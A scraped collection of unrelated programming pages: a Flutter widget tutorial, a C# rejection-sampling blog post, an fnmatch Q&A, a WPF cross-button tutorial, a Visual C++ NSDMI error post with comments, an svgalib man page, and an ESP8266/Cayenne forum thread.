The following code defines the home page, a stateful widget. In Flutter, all widgets are immutable, but two types of widgets are supported: stateful and stateless. Examples of a stateless widget are titles, icons, or images. The following example uses MaterialApp, which holds its root page in the home property.

class MyApp extends StatelessWidget {
  // This widget is the root of your application.
  @override
  Widget build(BuildContext context) {
    return new MaterialApp(
      title: 'Flutter Demo',
      theme: new ThemeData(
        primarySwatch: Colors.blue,
      ),
      home: new MyHomePage(title: 'Flutter Demo Home Page'),
    );
  }
}

From here, your actual first page is another widget, in which you create your state.

A stateful widget, such as MyHomePage below, consists of two parts. The first part, which is itself immutable, creates a State object that holds the state of the object. The State object persists over the life of the widget.

class MyHomePage extends StatefulWidget {
  MyHomePage({Key key, this.title}) : super(key: key);

  final String title;

  @override
  _MyHomePageState createState() => new _MyHomePageState();
}

The State object implements the build() method for the stateful widget. When the state of the widget tree changes, call setState(), which triggers a build of that portion of the UI. Make sure to call setState() only when necessary, and only on the part of the widget tree that has changed, or it can result in poor UI performance.

class _MyHomePageState extends State<MyHomePage> {
  int _counter = 0;

  void _incrementCounter() {
    setState(() {
      _counter++;
    });
  }

  @override
  Widget build(BuildContext context) {
    return new Scaffold(
      appBar: new AppBar(
        // Take the value from the MyHomePage object that was created by
        // the App.build method, and use it to set the appbar title.
        title: new Text(widget.title),
      ),
      body: new Center(
        // Center is a layout widget. It takes a single child and positions it
        // in the middle of the parent.
        child: new Text('$_counter'),
      ),
    );
  }
}

In Flutter, the UI (also known as the widget tree) is immutable, meaning you can't change its state once it's built. You change fields in your State class, then call setState() to rebuild the entire widget tree again. This way of generating UI is different from Xamarin.Forms, but there are many benefits to this approach.
http://semantic-portal.net/flutter-get-started-another-platform-xamarin-project-setup
Last time on FAIC we went through a loose, hand-wavy definition of what it means to have a "weighted" continuous distribution: our weights are now doubles, and given by a Probability Distribution Function; the probability of a sample coming from any particular range is the area under the curve of that range, divided by the total area under the function. (Which need not be 1.0.)

A central question of the rest of this series will be this problem: suppose we have a delegate that implements a non-normalized PDF; can we implement Sample() such that the samples conform to the distribution?

The short answer is: in general, no. A delegate from double to double that is defined over the entire range of doubles has well over a billion billion possible inputs and outputs. Consider for example the function that has a high-probability lump in the neighbourhood of -12345.678 and another one at 271828.18 and is zero everywhere else; if you really know nothing about the function, how would you know to look there? We need to know something about the PDF in order to implement Sample().

The long answer is: if we can make a few assumptions then sometimes we can do a pretty good job.

Aside: As I've mentioned before in this series: if we know the quantile function associated with the PDF then we can very easily sample from the distribution. We just sample from a standard continuous uniform distribution, call the quantile function with the sampled value, and the value returned is our sample. Let's assume that we do not know the quantile function of our PDF.

Let's look at an example. Suppose I have this weight function:

double Mixture(double x) =>
  Exp(-x * x) + Exp((1.0 - x) * (x - 1.0) * 10.0);

If we graph that out, it looks like this:

I called it "mixture" because it is the sum of two (non-normalized) normal distributions. This is a valid non-normalized PDF: it's a pure function from all doubles to a non-negative double and it has finite area under the curve.
How can we implement a Sample() method such that the histogram looks like this?

Exercise: Recall that I used a special technique to implement sampling from a normal distribution. You can use a variation on that technique to efficiently sample from a mixture of normal distributions; can you see how to do so? See if you can implement it.

However, the point of this exercise is: what if we did not know that there was a trick to sampling from this distribution? Can we sample from it anyways?

The technique I'm going to describe today is, once more, rejection sampling. The idea is straightforward; to make this technique work we need to find a weighted "helper" distribution that has this property:

The weight function of the helper distribution is always greater than or equal to the weight function we are trying to sample from.

Now, remember, the weight function need not be "scaled" so that the area under the curve is 1.0. This means that we can multiply any weight function by a positive constant, and the distribution associated with the multiplied weight function is the same. That means that we can weaken our requirement:

There exists a constant factor such that the weight function of the helper distribution multiplied by the factor is always greater than or equal to the weight function we are trying to sample from.

This will probably be more clear with an example. Let's take the standard normal distribution as our helper. We already know how to sample from it, and we know its weight function. But it just so happens that there exists a constant — seven — such that multiplying the constant factor by the helper's weight function dominates our desired distribution:

Again, we're going to throw some darts and hope they land below the red curve.

- The black curve is the weight function of the helper — the standard normal distribution — multiplied by seven.
- We know how to sample from that distribution.
- Doing so gives us an x coordinate for our dart, distributed according to the height of the black curve; the chosen coordinate is more likely to be in a higher region of any particular width than a lower region of the same width.
- We'll then pick a random y coordinate between the x axis and the black curve.
- Now we have a point that is definitely below the black line, and might be below the red line.
- If it is not below the red line, reject the sample and try again.
- If it is below the red line, the x coordinate is the sample.

Let's implement it!

Before we do, once again I'm going to implement a Bernoulli "flip" operation, this time as the class:

sealed class Flip<T> : IWeightedDistribution<T>
{
  public static IWeightedDistribution<T> Distribution(
    T heads, T tails, double p)

You know how this goes; I will skip writing out all that boilerplate code. We take values for "heads" and "tails", and the probability (from 0 to 1) of getting heads. See the github repository for the source code if you care.

I'm also going to implement this obvious helper:

static IWeightedDistribution<bool> BooleanBernoulli(double p) =>
  Flip<bool>.Distribution(true, false, p);

All right. How are we going to implement rejection sampling? I always begin by reasoning about what we want, and what we have. By assumption we have a target weight function, a helper distribution whose weight function "dominates" the given function when multiplied, and the multiplication factor. The code practically writes itself:

public class Rejection<T> : IWeightedDistribution<T>
{
  public static IWeightedDistribution<T> Distribution(
    Func<T, double> weight,
    IWeightedDistribution<T> helper,
    double factor = 1.0) =>
      new Rejection<T>(weight, helper, factor);

I'll skip the rest of the boilerplate. The weight function is just:

public double Weight(T t) => weight(t);

The interesting step is, as usual, in the sampling.
Rather than choosing a random number for the y coordinate directly, instead we'll just decide whether or not to accept or reject the sample based on a Bernoulli flip where the likelihood of success is the fraction of the weight consumed by the target weight function; if it is not clear to you why that works, give it some thought.

public T Sample()
{
  while (true)
  {
    T t = this.helper.Sample();
    double hw = this.helper.Weight(t) * this.factor;
    double w = this.weight(t);
    if (BooleanBernoulli(w / hw).Sample())
      return t;
  }
}

All right, let's take it for a spin:

var r = Rejection<double>.Distribution(
  Mixture, Normal.Standard, 7.0);
Console.WriteLine(r.Histogram(-2.0, 2.0));

And sure enough, the histogram looks exactly as we would wish:

[ASCII histogram of samples from -2.0 to 2.0, matching the two-humped mixture graph]

How efficient was rejection sampling in this case? Actually, pretty good. As you can see from the graph, the total area under the black curve is about three times the total area under the red curve, so on average we end up rejecting two samples for every one we accept. Not great, but certainly not terrible.

Could we improve that? Sure. You'll notice that the standard normal distribution times seven is not a great fit. We could shift the mean 0.5 to the right, and if we do that then we can reduce the multiplier to 4:

That is a far better fit, and if we sampled from this distribution instead, we'd reject a relatively small fraction of all the samples.

Exercise: Try implementing it that way and see if you get the same histogram.

Once again we've managed to implement Sample() by rejection sampling; once again, what are the pros and cons of this technique?
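If you want to experiment with this outside of C#, the same accept/reject loop is easy to sketch in Python (a translation of the idea above, not of Eric's library; the helper is the standard normal and the dominating factor is the same seven):

```python
import math
import random

def mixture(x):
    """The non-normalized target weight function: two Gaussian bumps."""
    return math.exp(-x * x) + math.exp((1.0 - x) * (x - 1.0) * 10.0)

def normal_weight(x):
    """Weight function (PDF) of the standard normal helper."""
    return math.exp(-x * x / 2.0) / math.sqrt(2.0 * math.pi)

def rejection_sample(weight, helper_sample, helper_weight, factor, rng):
    """Draw one sample from `weight` via rejection against a helper
    whose weight, multiplied by `factor`, dominates `weight`."""
    while True:
        x = helper_sample(rng)
        # Accept with probability weight(x) / (factor * helper_weight(x)),
        # i.e. the fraction of the dart's column lying under the red curve.
        if rng.random() * factor * helper_weight(x) <= weight(x):
            return x

rng = random.Random(27)
samples = [rejection_sample(mixture, lambda r: r.gauss(0.0, 1.0),
                            normal_weight, 7.0, rng)
           for _ in range(10000)]
```

Bucketing `samples` between -2 and 2 reproduces the two-humped histogram; with a factor of 7, roughly two out of every three darts are rejected, matching the area argument in the post.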
- Pro: it's conceptually very straightforward. We're just throwing darts and rejecting the darts that do not fall in the desired area. The darts that do fall in the desired area have the desired property: that samples from a given area arrive in proportion to that area's size.
- Con: It is by no means obvious how to find a tight-fitting helper distribution that we can sample such that the helper weight function is always bigger than the target weight function. What distribution should we use? How do we find the constant multiplication factor?

The rejection sampling method works best when we have the target weight function ahead of time so that we can graph it out and an expert can make a good decision about what the helper distribution should be. It works poorly when the weight function arrives at runtime, which, unfortunately, is often the case.

Next time on FAIC: We'll look at a completely different technique for sampling from an arbitrary PDF that requires less "expert choice" of a helper distribution.

Is that a boa constrictor digesting an elephant?

Close. It's Mount Snuffleupagus.

I was just going to propose the name "Saint-Exupéry's Elephant Curve", in the same vein as the normal distribution being also known as the bell curve.

Really enjoying this series, especially your points about the IDistribution abstraction. Do you think there is mileage in creating a class library with some of these implementations? Are you planning on doing so? I guess you've pointed out on a number of occasions that you'd take more care over performance and API design if you were doing this for production code, so more thought would be required than just using the code you've supplied in this series.

I doubt I will go to the work of making a really solid implementation; I'm more trying to get the ideas across.
My primary purpose here is that I enjoy thinking about how these concepts intersect with programming language design; this is an area of active research in programming languages, and I'm having fun learning about it. I hope my readers are too.

But there is a secondary purpose. C# has historically succeeded when it embeds yet another monad in the language to solve a real user problem. C# 2 added language support for the nullable monad, C# 2 and 3 added language support for the sequence monad (and did so in a way that supported the observable collection monad), and C# 5 added language support for the task monad. These changes were not just the incremental change you get from a new library; they enabled us to think about programming in C# in a different way.

The gear that the C# team added for user-supplied awaitable types is *so close* to what you'd need in the compiler to do probabilistic workflows embedded in the language. My secondary purpose is to make the case that the C# team should be thinking about what the next monad to add is.

Thanks to the success of machine learning, we're building all sorts of probabilistic reasoning into important workflows, but the language and libraries are still clunky. And because Bayesian reasoning is sometimes counterintuitive, it's easy to make a mistake. When asynchronous workflows were a clunky, error-prone spaghetti of callbacks, we added gear to the language that enabled you to make the compiler do the hard work of rewriting the program into callbacks. Well, we can do the same here; we can make the compiler and libraries do the hard work of analyzing and rewriting a probabilistic workflow also.

A related question: if you were to make a class library (or indeed implement some of these distributions as part of another project) and you wanted to test the implementations, how would you do so? So far we've drawn a histogram and eyeballed it, but that isn't particularly scientific, nor is it easily repeatable.
However, if you wanted to write automated tests, that would be tricky, because the whole point of probabilistic distributions is that you can't predict what you'll get. I think there would be value in testing the distributions, because some of the algorithms you'd use to implement them are quite fiddly. Any advice?

You'll notice that in the early days I called out that there was a difference between random and pseudo-random number providers; a classic way to make tests on stochastic code repeatable is to use a pseudo-random source, and make the initialization information part of each test suite.

Suppose you implement the Poisson distribution (perhaps using one of these), and you test it by supplying a deterministically-seeded pseudo-random number generator. As I see it there are two options for how you write your assertions.

1. Generate n samples and check they match a hard-coded collection of n integers. This has the problem that if you change your algorithm the tests will fail, even if the new algorithm does produce values according to the correct distribution. We're testing the implementation, not the behaviour.

2. Generate n samples and check they correspond to the expected histogram, within some tolerance. The problem here is picking an appropriate tolerance, so that you avoid both false negatives and false positives.

Which approach would you suggest? Can you see any way round the problems I've mentioned?

Pingback: Fixing Random, part 28 | Fabulous adventures in coding
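For what it's worth, the second option in the comment above can be made concrete with a seeded generator and a per-bucket frequency check; the bucket count and tolerance below are illustrative choices, not recommendations:

```python
import random

def check_uniform_sampler(sample, n=100000, buckets=10, tolerance=0.05):
    """Bucket `n` samples of a [0, 1) sampler and verify each bucket's
    observed count is within `tolerance` of the expected n / buckets."""
    counts = [0] * buckets
    for _ in range(n):
        x = sample()
        counts[min(int(x * buckets), buckets - 1)] += 1
    expected = n / buckets
    return all(abs(c - expected) <= tolerance * expected for c in counts)

# A deterministically seeded generator makes the test repeatable.
rng = random.Random(42)
print(check_uniform_sampler(rng.random))
```

With these numbers the tolerance corresponds to roughly five standard deviations of a binomial bucket count, so a healthy generator passes while a skewed one (say, squaring each uniform sample) fails decisively.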
https://ericlippert.com/2019/05/02/fixing-random-part-27/
I am trying to find a file *tech.so using fnmatch.fnmatch(name, pattern):

import os, fnmatch

path = "\\\\location1\\build1\\obj\\vendor\\qcom\\opensource\\tech"

def find(pattern, path):
    result = []
    for root, dirs, files in os.walk(path):
        for name in files:
            # print name
            if fnmatch.fnmatch(name, pattern):
                result.append(os.path.join(root, name))
    return result

result = find('*.tech.so', path)
print result  # prints an empty list

Answer: Your match pattern is *.tech.so, but the name you're looking for is caq_cdl3_tech.so. fnmatch patterns aren't the same as a regex, so . only matches a literal ., not "any single character" as it would in a regex. Using *tech.so or *_tech.so as the pattern should work.
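The distinction the answer draws can be checked directly (shown here in Python 3 syntax; fnmatch.translate() reveals the regular expression a glob pattern compiles to):

```python
import fnmatch

name = "caq_cdl3_tech.so"

# In a glob pattern the dot is literal, so '*.tech.so' requires the name
# to end with ".tech.so", which this file name does not.
print(fnmatch.fnmatch(name, "*.tech.so"))   # False
print(fnmatch.fnmatch(name, "*tech.so"))    # True
print(fnmatch.fnmatch(name, "*_tech.so"))   # True

# translate() shows the regular expression behind each glob pattern.
print(fnmatch.translate("*.tech.so"))
```

The printed regex makes the behaviour obvious: the `.` in the pattern is escaped, so it can only match a literal dot.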
https://codedump.io/share/D3R6MjTAD7Jk/1/pattern-match-failing-while-finding-a-file
In this article, I'll show you how to create a very simple control to represent a small cross button - the sort that you see in tabbed windows or certain controls. I found that when creating a custom tab control that allowed the user to close the tabs with a small button, a control like this would be useful. However, in later projects, this small control has been surprisingly versatile.

Let's get started. Create a new Visual Studio solution and add a WPF Custom Control Library to it. The custom control code is very simple:

/// <summary>
/// The Cross Button is a very simple version
/// of the button that displays as a discrete cross,
/// similar to the buttons at the top of Google Chrome's tabs.
/// </summary>
public class CrossButton : Button
{
    /// <summary>
    /// Initializes the <see cref="CrossButton"/> class.
    /// </summary>
    static CrossButton()
    {
        // Set the style key, so that our control template is used.
        DefaultStyleKeyProperty.OverrideMetadata(typeof(CrossButton),
            new FrameworkPropertyMetadata(typeof(CrossButton)));
    }
}

We are deriving the control from Button; the only thing this code really does is make sure that the style we use for the CrossButton is the correct style that we will add in our Generic.xaml dictionary.

We actually have no custom code in the control - we could define the whole thing as a style that just re-templates the button. However, in my local version, I have added a few more features - if you have a class like this, you can extend yours too.

The XAML in the Generic.xaml file is basic as well:

<ResourceDictionary xmlns="" xmlns:x="" xmlns:
  <Style TargetType="{x:Type local:CrossButton}">

Because Generic.xaml is a resource dictionary, we need a reference to the namespace we have defined the control in. The only thing we have in the resource dictionary is the style for the cross button.
Note: If you want to implement this control simply as a style, just set the target type to 'Button' and give the style a key - then apply the style to any button.

Moving on, we'll need a few resources for the button.

<!-- Brushes we use for the control. -->
<Style.Resources>
  <SolidColorBrush x:
  <SolidColorBrush x:
  <SolidColorBrush x:
  <SolidColorBrush x:
  <SolidColorBrush x:
  <SolidColorBrush x:
  <SolidColorBrush x:
  <SolidColorBrush x:
</Style.Resources>

These are the brushes we'll use to paint the button in its various states.

<!-- Simple properties that we set. -->
<Setter Property="Cursor" Value="Hand" />
<Setter Property="Focusable" Value="False" />

This is such a small button that it'll help to have the cursor as a hand so that it is obvious it is clickable. Also, by setting Focusable to False, we stop the user from tabbing to the control, which in most circumstances would be a bit odd.

Here's where it gets more interesting:

<!-- The control template. -->
<Setter Property="Template">
  <Setter.Value>
    <ControlTemplate TargetType="{x:Type Button}">

This is where we are going to change the control's template. The control template is what is used to draw the control - by changing the template, we can completely change how we draw the control.

<Grid Background="Transparent">
  <!-- The background of the button, as an ellipse. -->
  <Ellipse x:
  <!-- A path that renders a cross. -->
  <Path x:

The cross button is a simple looking button - a small cross with a red circle behind it when the mouse is over it. We put the ellipse and path (which will draw the cross) in a grid, drawing one on top of the other.
We have the path, but we'll need to define the geometry for it:

<Path.Data>
  <PathGeometry>
    <PathGeometry.Figures>
      <PathFigure StartPoint="0,0">
        <LineSegment Point="25,25"/>
      </PathFigure>
      <PathFigure StartPoint="0,25">
        <LineSegment Point="25,0"/>
      </PathFigure>
    </PathGeometry.Figures>
  </PathGeometry>
</Path.Data>
</Path>
</Grid>

The geometry is very simple - two line segments! We can close the path and the grid and now move onto the more interactive features. We'll use triggers to change colours as the mouse moves over the control.

<!-- The triggers. -->
<ControlTemplate.Triggers>
  <Trigger Property="IsMouseOver" Value="True">
    <Setter TargetName="backgroundEllipse" Property="Fill" Value="{StaticResource HoverBackgroundBrush}" />
    <Setter TargetName="ButtonPath" Property="Stroke" Value="{StaticResource HoverForegroundBrush}"/>
  </Trigger>

The first trigger is fired when the mouse moves over - simply changing the colour of the background ellipse and the button path.

<Trigger Property="IsEnabled" Value="false">
  <Setter Property="Visibility" Value="Collapsed"/>
</Trigger>

If the control isn't enabled, we'll just hide it - it's a very discrete little button.

<Trigger Property="IsPressed" Value="true">
  <Setter TargetName="backgroundEllipse" Property="Fill" Value="{StaticResource PressedBackgroundBrush}" />
  <Setter TargetName="backgroundEllipse" Property="Stroke" Value="{StaticResource PressedBorderBrush}" />
  <Setter TargetName="ButtonPath" Property="Stroke" Value="{StaticResource PressedForegroundBrush}"/>
</Trigger>
</ControlTemplate.Triggers>
</ControlTemplate>
</Setter.Value>
</Setter>
</Style>
</ResourceDictionary>

We use the final trigger to colour the control black and white when it is pressed. After this, we close all of the tags and we're done with the dictionary.
The example application shows how to use the control in a data template to remove items from a list: This is just one use for the control - below is another (not in the example): If anyone would find the above control useful, let me know and I'll write an article.
http://www.codeproject.com/Articles/242628/A-Simple-Cross-Button-for-WPF
ago) for handling initialization suffers from many longstanding architectural limitations. This code was sufficient for C++03-style initialization, but NSDMI, a C++11 feature, caused it to exhibit these limitations as severe bugs. One of these bugs is described in the MSDN article about error C2797. List initialization inside a non-static data member initializer would have been silently converted into a function call, resulting in incorrect behavior. That is, if one writes:

#include <vector>
class S {
    std::vector<int> v{ 1, 2 };
};

The compiler would have treated the code above as if the user had written:

#include <vector>
class S {
    std::vector<int> v = std::vector<int>(1, 2);
};

Instead of initializing the vector with the two given elements, the Visual Studio 2013 RTM compiler initializes it with length one and a single element with the value 2.

We've received countless bug reports about this behavior in the past year. Furthermore, this is not the only issue that prevents initializer lists from functioning correctly. We originally planned to fix this bug in an update to Visual Studio 2013, but from an engineering perspective, the right thing to do is to avoid another kludge and thoroughly address the handling of initialization. But overhauling compiler architecture is a massive task due to the amount of fundamental code that needs to be modified. We could not risk creating incompatibilities or large bug tails in an update, so a correct implementation of NSDMI could only be shipped in a major release.

Meanwhile, we still needed to address the steady stream of incoming feedback about bad code generation, so we made the hard decision of creating error C2797. This error guides users towards avoiding the issue and working around it by writing explicit constructions of inner lists, as the MSDN article suggests.
The following code, for example, works as expected:

#include <vector>
class S {
    std::vector<int> v = std::vector<int>{ 1, 2 };
};

We are aware that the release notes for Visual Studio 2013 Update 3 did not include a notification about this new error. That was a mistake and we sincerely apologize for any confusion this has caused. However, C2797 will continue to be present in all future versions of Visual Studio 2013, so we recommend that you immediately make use of the provided workarounds. The architectural changes and fixes for initialization will be included in Visual Studio "14" RTM.

I am afraid I don't really agree with your decision to force customers to buy the new version of your product (Visual Studio "14") in order to overcome bugs present in the current release from just 10 months ago.

Hi, this post really should have been published a day or so before Update 3 came out and all would have been good ;-) Anyway, make sure that VS14 is C++14 compliant and all is forgotten :-) Kind regards, Sven

I agree with Evgenii Golubev, this is pretty shoddy. I purchased 2012 only to find it broken, upgraded to 2013 to still find key features broken, and the solution is another upgrade - still with key features missing or broken, no doubt? I recall Herb promising a new dawn for C++ on Microsoft platforms but what we get is the same old feeble tools. The open source community is light-years ahead on quality and delivery on what should be your cornerstone product. Microsoft has deep pockets and it's about time it got the checkbook out and hired an army of top talent to get this house in order, really oh dear me.

Thanks for the explanation and the workaround! I totally agree that a hard error with a known workaround is better than silent bad code generation. Glad to hear it will finally be fixed in VC14.

VS 2013 is much slower and buggier than VS 2012.
How about concentrating on increasing performance and stability and decoupling the C++ tool chain from the IDE so you can update it without forcing us to spend quite a bit of money updating the IDE? Microsoft also needs to get back to the idea that happy developers means more and better products. (Versus seeing dev tools as a potential profit center.)

Start a new compiler. New team. Using old, what was it, Lattice, as an excuse only shows how badly this needs to happen.

What!? You refuse to fix a serious bug and blame the age of the code base? Seriously, just start over with Clang.

Thanks for explaining and documenting this limitation. I can live with it even though I don't like it. I know how hard it is to deal with ancient codebases from my own experience. And I certainly agree on not kludging stuff on. May I suggest grafting the shiny new VS '14' initialization code (after release) back onto VS2013 in the form of a final service pack or whatever you may call a bugfix update? Face-palm deficiencies like the above should be addressed in a professional product, imho.

Dear Kangyuan Niu, you wrote about the code in your compiler: "This code was sufficient for C++03-style initialization". However, an important feature introduced by the C++03 standard was never fully implemented by Visual C++: value-initialization. Is there any chance that the next release of Visual C++ will finally fully support C++03-style value-initialization?

See also:
- Bug ID 499606, "Presence of copy constructor breaks member class initialization", by Alex Vakulenko
- Bug ID 484295, "VC++ does not value-initialize members of derived classes without user-declared constructor", by Sylvester
- Bug ID 100744, "Value-initialization in new-expression", reported by Pavel back in 2005 (was removed from Connect!)

My compiler test on value-initialization at Boost: svn.boost.org/…/boost_no_com_value_init.ipp

Which can be used as follows:

Sorry to repeat myself.
I asked the same question before, on 10 August, at blogs.msdn.com/…/visual-studio-14-ctp-2-available.aspx

Agreed. Support Visual Studio versions released within the last 2.5 years. We have the same thing with Visual Studio 2012 having only minimal fixes for core functionality. The VS 2012 updates added extra features we did not need. We reduced our footprint of tools, libraries, etc to only Tier 1 supported ones from MS for just this reason. Tier 1 including compiler, linker, debugger, SQL Server, basic OS, network APIs and little else. Tier 2 technologies are likely to be end of life, unsupported, or touch-released (release only to update the release date with little or no changes to the underlying code base).

Yes, please make this fix available to VS2013 as a final update. If breaking code is a concern, why not release it as a separate Platform Toolset? That's what this mechanism is for, right!? Just make sure the STL is part of that toolset; then everyone is happy and it won't interfere with the original VS2013 compiler.

Everyone, thanks for voicing your opinions. Niels, I have responded to you in the other thread. Regarding a potential "final patch" for Visual Studio 2013 that fixes NSDMI: We cannot do that. To implement initialization correctly, we've had to make major architectural changes in the compiler and it would be impossible to back-port those changes. We also can't bring back the incorrect RTM behavior because we feel that providing this diagnostic is strictly better than letting users deal with a very puzzling silent bad code generation issue. The downside is that some previously working code will no longer compile, but the upside is that the compiler will now reject code that had a risk of behaving badly anyway.

Sorry, Kangyuan, but there is no technical reason you cannot patch Visual Studio 2010, 2012 and 2013. None. If it would break a developer's code, then he doesn't update. It's that simple.
The only reasons Microsoft won't do this (and decouple the compiler and Visual Studio version) are arrogance and greed. This kind of nonsense may work with Office and users who haven't dealt with this very attitude at their own jobs. But you are dealing with developers, most of whom have sat in meetings while pointy-head managers and marketers decided features should be in the bullet list of the next upgrade. (Incidentally, throwing the same effort into Clang and LLVM would be a boon to C++ developers everywhere.)

In my view Microsoft had plenty of time to fix their architecture. C++11 features have been in talks for close to 10 years now. And Herb is the head of the committee. How could you not have foreseen that? 10 years is plenty of time to get a new compiler project started to clean out the old gunk.

It's good to see such information published! Thanks for that. And again, we see how coupling the C++ compiler to the IDE as tightly as MS does is holding you back from speedily adopting properly working C++ features. You see, the *real* problem with stuff like this is not that I have to buy a new VS version (isn't everyone on an MSDN subscription anyway) — the real problem is that, to get a new and fixed compiler, I have to wait for the whole bloody IDE package to be available, including an oil tanker full of features that I never need.

"We cannot do that. To implement initialization correctly, we've had to make major architectural changes in the compiler and it would be impossible to back-port those changes."

Well, I simply don't believe your claims. I don't see a reason why you cannot publish the NEW compiler as a PLATFORM TOOLSET like you do it for the CTP releases. No need to backport IDE changes… I think no one would worry if the autocorrection/completion does not work 100%. I think it's rather "We have decided not to do it – whether you like it or not". Other companies maintain their products for a decade; VS2013 was released a year ago! I also want to remind you that VS still is not a pure subscription-based service (if you don't want full MSDN) where it would not matter – lots of people bought a single license.
I also want to remind you that VS still is not a pure subscription-based service (if you don't want full MSDN) where it would not matter – lots of people bought a single license. Our 20+ enterprise systems are developed and maintained by 9 developers. Each year, we get to do major releases for 2 of them plus multiple minor releases for the others. Upgrading a VS version is, at best, done once every 3-4 years for each application. It's why we need more than 6-9 months of updates to a VS version.

VS 2010 released April 2010
VS 2012 released September 2012
VS 2013 released October 2013

We build an individual development VM for each application with the particular development tools for that application to minimize the effect of conflicting VS and OS updates. This is why having the development tools updated for more than 9 months after release is important; and having the technical documentation available online and, importantly, offline, installed into the VM, is important. A slimmed-down VS would help towards this, in that we use a small set of VS features outside of the compiler, debugger, linker, and project explorer. For agile, we use only basic TFS user story/backlog item creation, editing and costing. This is to lower the moving-part count and lower our maintenance effort. Not upgrading to Update 3. Making this a compiler error in Update 3 was idiotic. There wouldn't be such a controversy if C2797 were present in 2013 RTM. Adding this error seems sensible to me. But when you don't fix much smaller things (see my previous posts about Connect issues) that you could fix, I can see why nobody believes you this time. "Why don't you just use clang?" is a chorus that needs to be listened to and answered. The third row of the table on msdn.microsoft.com/…/hh567368.aspx lists "Non-static data member initializers" as supported in Visual Studio 2013 — please provide an updated table of supported features. This is terrible.
I am writing a cross-platform application, and supporting Windows has now become that much more of a chore. Now I have to abandon using such a nice feature of C++ just to support Windows, after all the time I spent writing code that worked in Update 2. I don't understand why they can't fix this 90% of the way for 2013 and provide the correct fix in 2014. I can't believe Microsoft treats the users of such an important product with such contempt. Thanks for the explanation! Related question: is there a way to fix the debug information for Non-static Data Member Initialization of derived classes?

Scenario:
– base class Foo
– derived class Bar has an NSDMI for private member int bar = 5;
– derived class .cpp file has ctor, dtor, etc.
– breakpoint in the derived Bar ctor triggers; stepping through does not lead to the .h NSDMI, but rather jumps arbitrarily through the .cpp!

Code:

//-----
// FOO.H
#pragma once
class Foo
{
public:
    Foo( void ) = default;
};

//-----
// BAR.H
#pragma once
#include "Foo.h"
class Bar : public Foo
{
public:
    Bar();
    ~Bar();
private:
    int bar = 5;
};

//-----
// BAR.CPP
#include "Bar.h"
Bar::Bar()
{
    // <--- BREAKPOINT (step through & watch the jumping)
}
Bar::~Bar()
{
}

//-----
// MAIN.CPP
#include "Bar.h"
int main( void )
{
    Bar bar;
    return 0;
}

Visual Studio Info:
– Version 12.0.30723.00 Update 3
– C++ Console Application
– Obviously in Debug mode, just getting bad debug info from the constructor with NSDMI.
https://blogs.msdn.microsoft.com/vcblog/2014/08/19/the-future-of-non-static-data-member-initialization/
NAME mouse_setscale - sets a mouse scale factor SYNOPSIS #include <vgamouse.h> void mouse_setscale(int s); DESCRIPTION This routine sets the scale factor between the motion reported by the mouse and the size of one pixel. The larger the scale is, the slower the mouse cursor appears to move. The scale may be set to any non-zero integer. Negative scales result in flipped axes. Currently, there is no support for scale factors between 0 and 1 which would make the mouse appear faster than usual. If this routine is never called, scale s defaults to 1. SEE ALSO svgalib(7), vgagl(7), libvga.config(5), eventtest(6), mouse_init(3), mouse_close(3), mouse_getposition_6d(3), mouse_getx(3), mouse_setposition.
http://manpages.ubuntu.com/manpages/oneiric/man3/mouse_setscale.3.html
Hi Craig, Thanks for the response. Yes, I have tried two types of devices, NodeMCU and Wemos, connected to Cayenne without problems. I am sure it's not about the firewall because when I upload the script, there is no new DHCP client connected in my router. (It's only shown in DHCP clients when I am debugging the connection with AT+CWJAP="MyRouter","Password".) Hi @kreggly Do you know how to solve this type of error? (I'm using an Arduino Uno + ESP8266)

C:\Users\Ricardo\Documents\Arduino\libraries\Cayenne-MQTT-ESP8266-master\src/CayenneMQTTESP8266.h:21:25: fatal error: ESP8266WiFi.h: No such file or directory
#include <ESP8266WiFi.h>

I attach the code, greetings. exampleesp8266.txt (1.7 KB)

That sketch is not designed to use the ESP as a shield. It is designed to reflash the firmware inside the ESP with this sketch. The Uno is entirely unnecessary. If you are trying to compile it for Uno, I can see how you might get errors. I have not seen a sketch yet that uses the ESP as a shield with MQTT. Cheers, Craig

And with a wifi shield, if possible? What type of wifi shield should I buy to connect my Arduino Uno by wifi to Cayenne? I'm new to this; I thought an ESP8266 module was enough. The ESP modules are magical. They can actually be programmed with an Arduino sketch. You don't need an Arduino at all. If you do want to use an ESP with an Uno, so you have access to the IO etc., you can use the ESP as a Uno WiFi shield. You just need to use the Blynk-based Cayenne library and program the ESP with an AT command set. You can also upload the ESP MQTT sketch to the ESP - the sketch you attached earlier - and get connected to Cayenne. I do not know of a way to use the ESP as a Uno WiFi shield with the Cayenne MQTT, however. Does this clarify things for you? Finally, after so many attempts following this conversation, I tried this method, and the code was successfully uploaded to Arduino.
But when I opened my Cayenne Dashboard, the Arduino was still offline. The Serial Monitor displayed the following messages:

ATE0
AT+CIPSTART="TCP","arduino.mydevices.com",8442
AT+CIPCLOSE

Did I miss out any steps or something? Kindly do help me asap. I've been stuck with this for a long time. Your help is much appreciated. THANKS IN ADVANCE

Hi @saromarimuthu Were you able to flash the ESP firmware with the AT command set? @kreggly may be able to help there. I've done it but can't remember where I got the .bin file used for the AT set. I used a flash program I found online and used a USB to TTL card to connect to the rx and tx pins. Yeah, I have the PlDuino talking Cayenne. I'll write something up showing how soon. You can use the NodeMCU windows app to load the AT SW. I put 1.3 in the PlDuino ESP-02. The Cayenne lib supports 1.0 and above. Awesome! I finally hooked up my ESP-01 to my UNO and your code is working for me as well. One thing that I do have to point out is that "#define EspSerial Serial1" does not work on an UNO. The correct line is "#define EspSerial Serial". Found this on another forum:

Arduino Uno doesn't have Serial1, only Serial: 0 (RX) and 1 (TX). Used to receive (RX) and transmit (TX) TTL serial data. These pins are connected to the corresponding pins of the ATmega8U2 USB-to-TTL Serial chip.

I'm not exactly sure what they mean by "Arduino Uno doesn't have Serial1, only Serial". This is true for Uno. I made that statement elsewhere. We really need a clean space to put moderated/tested solutions. I'd like to figure out how to get Cayenne to support the SoftwareSerial library. Then we could drop the ESP on some generic pins and keep "Serial" for debug. The Cayenne lib doesn't like being passed a SoftwareSerial port. hi.. my wifi module model is ESP8266 12F, for this module how do I connect? Two ways. Program the ESP with firmware that speaks Cayenne. Program it with the AT command firmware and command it with an Arduino through the serial port.
Both ways are detailed on the forum. When I have time, I have been asked to make better how-tos on connecting the myriad ESP devices, but I only volunteer here. My day job designing control systems keeps me pretty busy. If you don't find the answers by searching the forum, I'll likely get around to some documentation this Saturday. Sunday, I'm brewing beer! I get the following error:

